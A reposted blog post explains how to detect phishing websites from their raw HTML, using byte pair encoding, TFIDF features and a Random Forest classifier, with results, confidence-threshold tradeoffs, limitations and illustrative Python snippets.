By Faizan Ahmad, University of Virginia
There is hardly a week when you go to Google News and don’t find a news article about phishing. Just in the last week, hackers sent phishing emails to Disney+ subscribers, ‘Shark Tank’ star Barbara Corcoran lost almost $400K in a phishing scam, a bank issued phishing warnings, and almost three-quarters of all phishing websites now use SSL. Since phishing is such a widespread problem in the cybersecurity domain, let us take a look at the application of machine learning for phishing website detection. Although there have been many articles and research papers on this topic [Malicious URL Detection] [Phishing Website Detection by Visual Whitelists] [Novel Techniques for Detecting Phishing], they do not always provide open-source code or dive deep into the analysis. This post is written to address these gaps. We will use a large phishing website corpus and apply a few simple machine learning methods to obtain highly accurate results.
Data
The best part about tackling this problem with machine learning is the availability of well-collected phishing website data sets, one of which was collected by folks at the Universiti Malaysia Sarawak. The ‘Phishing Dataset – A Phishing and Legitimate Dataset for Rapid Benchmarking’ data set consists of 30,000 websites, of which 15,000 are phishing and 15,000 are legitimate. Each website in the data set comes with its HTML code, whois info, URL, and all the files embedded in the web page. This is a goldmine for someone looking to apply machine learning to phishing detection. There are several ways this data set can be used. We can try to detect phishing websites by looking at the URLs and whois information and manually extracting features, as some previous studies have done [1]. However, we are going to use the raw HTML code of the web pages to see if we can effectively combat phishing websites by building a machine learning system. Among URLs, whois information, and HTML code, the last is the most difficult for an attacker to obfuscate or change when trying to evade detection, hence the use of HTML code in our system. Another approach is to combine all three sources, which should give better and more robust results, but for the sake of simplicity we will only use HTML code and show that it alone yields effective results for phishing website detection. One final note on the data set: we will only be using 20,000 total samples because of computing constraints. We will also only consider websites written in English, since data for other languages is sparse.
Byte Pair Encoding for HTML Code
To the untrained eye, HTML code does not look as simple as natural language. Moreover, developers often do not follow good practices while writing code. This makes it hard to parse HTML code and extract words/tokens. Another challenge is that many words and tokens in HTML code are rare. For instance, if a web page is using a special library with a complex name, we might not find that name on other websites. Finally, since we want to deploy our system in the real world, there might be new web pages using completely different libraries and coding practices that our model has not seen before. This makes it harder to use simple language tokenizers that split code into tokens based on spaces, tags, or other characters. Fortunately, we have an algorithm called Byte Pair Encoding (BPE) that splits text into sub-word tokens based on frequency and solves the challenge of unknown words. In BPE, we start by considering each character as a token and iteratively merge the most frequent pairs of adjacent tokens. For instance, if a new word “googlefacebook” appears, BPE will split it into “google” and “facebook”, as these words are likely to be frequent in the corpus. BPE has been widely used in recent deep learning models [2].
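To make the merge procedure concrete, here is a toy sketch of BPE in plain Python. It is only an illustration of the idea described above, not the implementation used in this post; the function names `learn_bpe_merges`, `merge_pair`, and `apply_bpe` are made up for this example, and the tiny corpus is hypothetical.

```python
from collections import Counter


def merge_pair(tokens, pair):
    """Replace every adjacent occurrence of `pair` in `tokens` with one merged token."""
    merged, i = [], 0
    while i < len(tokens):
        if i + 1 < len(tokens) and (tokens[i], tokens[i + 1]) == pair:
            merged.append(tokens[i] + tokens[i + 1])
            i += 2
        else:
            merged.append(tokens[i])
            i += 1
    return tuple(merged)


def learn_bpe_merges(words, num_merges):
    """Learn up to `num_merges` merges from a list of words (toy sketch)."""
    # Start with every word split into single-character tokens.
    corpus = Counter(tuple(word) for word in words)
    merges = []
    for _ in range(num_merges):
        # Count how often each pair of adjacent tokens occurs in the corpus.
        pair_counts = Counter()
        for tokens, freq in corpus.items():
            for pair in zip(tokens, tokens[1:]):
                pair_counts[pair] += freq
        if not pair_counts:
            break  # every word is already a single token
        best_pair = max(pair_counts, key=pair_counts.get)
        merges.append(best_pair)
        # Apply the most frequent merge everywhere before counting again.
        new_corpus = Counter()
        for tokens, freq in corpus.items():
            new_corpus[merge_pair(tokens, best_pair)] += freq
        corpus = new_corpus
    return merges


def apply_bpe(word, merges):
    """Tokenize an unseen word by replaying the learned merges in order."""
    tokens = tuple(word)
    for pair in merges:
        tokens = merge_pair(tokens, pair)
    return list(tokens)


# Hypothetical corpus in which "google" and "facebook" are frequent words.
merges = learn_bpe_merges(["google"] * 5 + ["facebook"] * 5, num_merges=20)
print(apply_bpe("googlefacebook", merges))  # ['google', 'facebook']
```

The pair "e" + "f" never occurs inside a training word, so no merge crosses the boundary and the unseen word falls apart into the two known pieces.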
There are numerous libraries for training BPE on a text corpus. We will use a great one called tokenizers by Hugging Face. It is extremely easy to follow the instructions on the GitHub repository of the library. We train BPE with a vocabulary size of 10,000 tokens on top of raw HTML data. The beauty of BPE is that it automatically separates HTML keywords such as “tag”, “script”, and “div” into individual tokens even though these keywords are mostly written with brackets in an HTML file, e.g., <tag>, <script>. After training, we get a saved instance of the tokenizer which we can use to tokenize any HTML file into individual tokens. These tokens are then used as input to the machine learning models.
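As a rough sketch of what training could look like with the current Hugging Face tokenizers API: the whitespace pre-tokenizer, the `[UNK]` token, and the helper name `train_html_bpe` are assumptions made for this example, and the exact setup used for the experiments in this post may differ (see the repository linked at the end). The sample pages are hypothetical.

```python
from tokenizers import Tokenizer
from tokenizers.models import BPE
from tokenizers.pre_tokenizers import Whitespace
from tokenizers.trainers import BpeTrainer


def train_html_bpe(html_documents, vocab_size=10000):
    """Train a BPE tokenizer on an iterable of raw HTML strings (illustrative helper)."""
    tokenizer = Tokenizer(BPE(unk_token="[UNK]"))
    # Assumption: split on whitespace and punctuation before learning merges.
    tokenizer.pre_tokenizer = Whitespace()
    trainer = BpeTrainer(
        vocab_size=vocab_size,
        special_tokens=["[UNK]"],
        show_progress=False,
    )
    tokenizer.train_from_iterator(html_documents, trainer=trainer)
    return tokenizer


# Hypothetical miniature corpus; the post trains on thousands of real pages.
sample_pages = [
    "<html><body><div><script>alert(1)</script></div></body></html>",
    "<html><body><div><form><input type='password'></form></div></body></html>",
] * 10

tokenizer = train_html_bpe(sample_pages, vocab_size=200)
tokens = tokenizer.encode("<div><script>alert(1)</script></div>").tokens
print(tokens)
```

A trained tokenizer can be persisted with `tokenizer.save(path)` and reloaded with `Tokenizer.from_file(path)`, which matches the "saved instance" workflow described above.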
TFIDF with Byte Pair Encoding
Once we have tokens from an HTML file, we can apply any model. However, contrary to what most people do these days, we will not be using a deep learning model such as a Convolutional Neural Network (CNN) or Recurrent Neural Network (RNN). This is mainly because of the computational complexity and the relatively small size of the data set for deep learning models. The figure above shows a histogram of tokens from BPE in 1,000 HTML files. We can see that these files contain thousands of tokens, and processing them would incur a high computational cost in more complex models like CNNs and RNNs. Moreover, token order does not necessarily matter for phishing detection. This will be empirically evident once we look at the results. Therefore, we will simply apply TFIDF weights on top of each token from the BPE.
As explained in the previous post on Authorship Attribution, TFIDF stands for term frequency, inverse document frequency and can be calculated by the formula given below. Term frequency (tf) is the count of a term i in a document j, while inverse document frequency (idf) indicates the rarity and importance of each term in the corpus. Document frequency (df) is the number of documents in the corpus in which term i appears. TFIDF gives us a weight for each term in a document, which is the product of tf and idf.
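$$w_{i,j} = tf_{i,j} \times \log\left(\frac{N}{df_i}\right) \tag{1}$$
Here w_{i,j} is the weight of term i in document j, tf_{i,j} is its term frequency, df_i is the document frequency of term i, and N is the total number of documents in the corpus.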
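A minimal worked example of this weighting in plain Python may help. It assumes the common idf form log(N / df_i), where N is the number of documents; the function name `tfidf_weights` and the three token lists are hypothetical.

```python
import math
from collections import Counter


def tfidf_weights(token_docs):
    """Return one {token: weight} dict per document, using tf * log(N / df)."""
    n_docs = len(token_docs)
    # Document frequency: in how many documents does each token occur?
    doc_freq = Counter()
    for tokens in token_docs:
        doc_freq.update(set(tokens))
    weights = []
    for tokens in token_docs:
        term_freq = Counter(tokens)  # raw count of each token in this document
        weights.append(
            {
                token: count * math.log(n_docs / doc_freq[token])
                for token, count in term_freq.items()
            }
        )
    return weights


# Hypothetical BPE tokens from three tiny pages.
docs = [
    ["div", "script", "login", "login"],
    ["div", "script", "news"],
    ["div", "form", "login"],
]
weights = tfidf_weights(docs)
print(weights[0])
```

A token such as "div" that occurs in every document gets a weight of zero, while a token that is rare across the corpus but frequent in one page is weighted up.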
Machine Learning Classifier
Sticking with simplicity, we will use a Random Forest (RF) classifier from scikit-learn. To train the classifier, we split the data into 90% training and 10% testing. No cross-validation is done since we are not trying to extensively tune any hyperparameters; we stick with the default hyperparameters of the scikit-learn Random Forest implementation. In contrast to deep learning models that take a long time to train, RF takes less than 2 minutes to train on a CPU and demonstrates effective results, as shown next. To show robustness in performance, we train the model 5 times on different splits of the data and report the average test results.
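The training protocol above can be sketched with scikit-learn as follows. This is an illustration under assumptions rather than the exact experiment code: documents are represented as space-separated tokens, the helper name `average_test_accuracy` and the toy data are hypothetical, and `random_state` is set only to make the sketch reproducible. Note also that scikit-learn's `TfidfVectorizer` applies a smoothed idf and L2 normalization by default, so its weights differ slightly from the plain tf × idf product.

```python
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split


def average_test_accuracy(documents, labels, n_runs=5):
    """Train on n_runs different 90/10 splits and return the mean test accuracy."""
    accuracies = []
    for seed in range(n_runs):
        train_docs, test_docs, y_train, y_test = train_test_split(
            documents, labels, test_size=0.1, random_state=seed
        )
        # Tokens are already produced upstream, so split on whitespace only.
        vectorizer = TfidfVectorizer(lowercase=False, token_pattern=r"\S+")
        x_train = vectorizer.fit_transform(train_docs)
        x_test = vectorizer.transform(test_docs)
        # Default hyperparameters, as in the post; the seed is for reproducibility.
        classifier = RandomForestClassifier(random_state=seed)
        classifier.fit(x_train, y_train)
        accuracies.append(accuracy_score(y_test, classifier.predict(x_test)))
    return sum(accuracies) / len(accuracies)


# Hypothetical toy data: 1 = phishing, 0 = legitimate.
toy_docs = ["form password verify account login"] * 20 + ["div article news footer nav"] * 20
toy_labels = [1] * 20 + [0] * 20
mean_accuracy = average_test_accuracy(toy_docs, toy_labels)
print(f"mean test accuracy over 5 splits: {mean_accuracy:.3f}")
```

Fitting the vectorizer on the training portion only keeps the test pages out of the idf statistics.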
Results
Accuracy | Precision | Recall | Fscore | AUC |
98.55 | 98.29 | 98.82 | 98.55 | 99.68 |
Phishing Website Detection Results
The table above shows the results on test data averaged across 5 experiments. On the surface, these seem like great results, especially without any hyperparameter tuning and with a simple model. However, they are not so great. The model has 98% precision for both classes, which means it gives around 2% false positives when it is detecting phishing websites. That is a huge number in the security context. False positives are websites that the machine learning model deems to be phishing but that are in fact legitimate. If users frequently encounter false positives, they have a bad user experience and might not want to use the model anymore. Moreover, security teams experience threat alert fatigue when dealing with false positives. False positives are further quantified in the confusion matrix below, where the x-axis shows the actual classes and the y-axis shows the predicted classes. Even though the model achieves a high accuracy score, there are 11 instances where the model predicted “Phishing” for a website that was in reality safe.
Predicted Class \ Actual Class | Phishing | Legitimate |
Phishing | 920 (True Positive) | 11 (False Positive) |
Legitimate | 16 (False Negative) | 912 (True Negative) |
Confusion matrix for the model
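As a quick sanity check, the usual metrics can be recomputed from the four counts in the confusion matrix, treating phishing as the positive class. The counts come from a single test split, so the numbers need not match the 5-run averages in the results table exactly; the variable names are chosen for this example only.

```python
# Counts taken from the confusion matrix (phishing is the positive class).
true_pos, false_pos = 920, 11
false_neg, true_neg = 16, 912

total = true_pos + false_pos + false_neg + true_neg
accuracy = (true_pos + true_neg) / total
precision = true_pos / (true_pos + false_pos)        # how often a "phishing" verdict is right
recall = true_pos / (true_pos + false_neg)           # share of phishing sites that are caught
false_pos_rate = false_pos / (false_pos + true_neg)  # share of legitimate sites flagged

print(f"accuracy            = {accuracy:.4f}")        # 0.9855
print(f"precision           = {precision:.4f}")       # 0.9882
print(f"recall              = {recall:.4f}")          # 0.9829
print(f"false positive rate = {false_pos_rate:.4f}")  # 0.0119
```

Even a false positive rate of roughly 1% means that about one in every hundred legitimate websites would be flagged, which is why the raw accuracy figure is not the whole story.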
Now that we know there is still a problem with the model and we cannot deploy it as it is, let us look at a potential solution. We are going to use the Receiver Operating Characteristic (ROC) curve to look at the false and true positive rates. In the figure below, it is easy to see that for up to an 80% true positive rate, we have a 0% false positive rate, which is something we can use for decision making.
The ROC curve demonstrates that for a particular confidence threshold (red dot), the true positive rate would be around 80-90% while the false positive rate would be close to zero. To prove this, let us look at different confidence thresholds and plot metrics against them. To apply a confidence threshold of x%, we will only keep websites where the model is more than x% confident that the website is either legitimate or phishing. When we do this, the share of phishing websites we can identify (the true positive rate) decreases, but our accuracy increases considerably and precision becomes close to 100%.
The above figure demonstrates the effect of the confidence threshold on test accuracy, the number of false positives, and the true positive rate. We can see that when we use the default threshold of 0.5, we have 11 false positives. As we start to increase the confidence threshold, our true positive rate decreases but the number of false positives drops sharply. Finally, at the last point in the graph, we have zero false positives, i.e., 100% precision. This means that whenever our model says a website is trying to phish, it is always right. However, since our true positive rate has declined to 82%, the model can now only detect around 82% of phishing websites. This is how machine learning can be used in cybersecurity: by looking at the tradeoff between false positives and true positives. Most of the time, we want an extremely low false positive rate. In such settings, one can adopt the approach above to get effective results from the model.
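The thresholding procedure can be sketched in a few lines of plain Python. The function name `metrics_at_threshold` and the probabilities below are hypothetical; with a scikit-learn classifier, the phishing probabilities would typically come from `predict_proba`.

```python
def metrics_at_threshold(phishing_probs, labels, threshold):
    """Keep only confident predictions and score them (1 = phishing, 0 = legitimate)."""
    true_pos = false_pos = true_neg = false_neg = 0
    for prob, label in zip(phishing_probs, labels):
        if prob > threshold:          # confident "phishing" verdict
            if label == 1:
                true_pos += 1
            else:
                false_pos += 1
        elif prob < 1 - threshold:    # confident "legitimate" verdict
            if label == 0:
                true_neg += 1
            else:
                false_neg += 1
        # Otherwise the model is not confident enough and the site is left undecided.
    kept = true_pos + false_pos + true_neg + false_neg
    total_phishing = sum(labels)
    return {
        "accuracy_on_kept": (true_pos + true_neg) / kept if kept else float("nan"),
        "false_positives": false_pos,
        # Measured against all phishing sites, including the undecided ones.
        "true_positive_rate": true_pos / total_phishing if total_phishing else float("nan"),
    }


# Hypothetical model outputs for ten websites.
probs = [0.99, 0.95, 0.80, 0.60, 0.55, 0.45, 0.30, 0.15, 0.05, 0.02]
labels = [1, 1, 1, 1, 0, 1, 0, 0, 0, 0]

for threshold in (0.5, 0.9):
    print(threshold, metrics_at_threshold(probs, labels, threshold))
```

On this toy data, raising the threshold from 0.5 to 0.9 removes the single false positive and lifts accuracy on the kept websites from 0.8 to 1.0, while the true positive rate drops from 0.8 to 0.4. This is the same tradeoff as in the figure, on a much smaller scale.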
Limitations
Before concluding this post, let us discuss a few limitations of the methods we have seen above. First, although our data set is reasonably large, it is far from comprehensive for all the types of phishing websites out there. There might have been millions of phishing websites in the last couple of years, but the data set contains only 15,000. As hackers advance their techniques, newly made phishing websites might not make the same mistakes that the old ones did, which might make them hard to detect using the model above. Secondly, since the TFIDF feature representation does not take into account the order in which code is written, we can potentially lose information. This problem does not arise in deep learning methods that process tokens sequentially and take the order of the code into account. Moreover, since we are using raw HTML code, an attacker can observe the predictions of the model and spend some time trying to come up with obfuscations in the code that will render the model ineffective. Finally, someone can use off-the-shelf code obfuscators to obfuscate the HTML code, which will again render the model useless since it has only seen plain HTML code files. However, despite these limitations, machine learning can still be very effective in complementing phishing blacklists such as the ones used by Google Safe Browsing. Combining blacklists with machine learning systems can provide better results than relying on blacklists alone.
Open-Source Code
As I discussed in the first post of this blog, I will always open-source the code for the projects I discuss in this blog. Keeping the tradition alive, here is the link for replicating all experiments, training your own phishing detection models, and testing new websites using my pre-trained model.
Github Repository: https://github.com/faizann24/phishytics-machine-learning-for-phishing
Bio: Faizan Ahmad is currently a Master's student at the University of Virginia (UVA) and works as a graduate research assistant at the McIntire School of Commerce at UVA. He will be joining Facebook as a Security Engineer in June 2020. His interests lie at the intersection of cybersecurity, machine learning, and business analytics, and he has done plenty of research and industrial projects on these topics.
Original. Reposted with permission.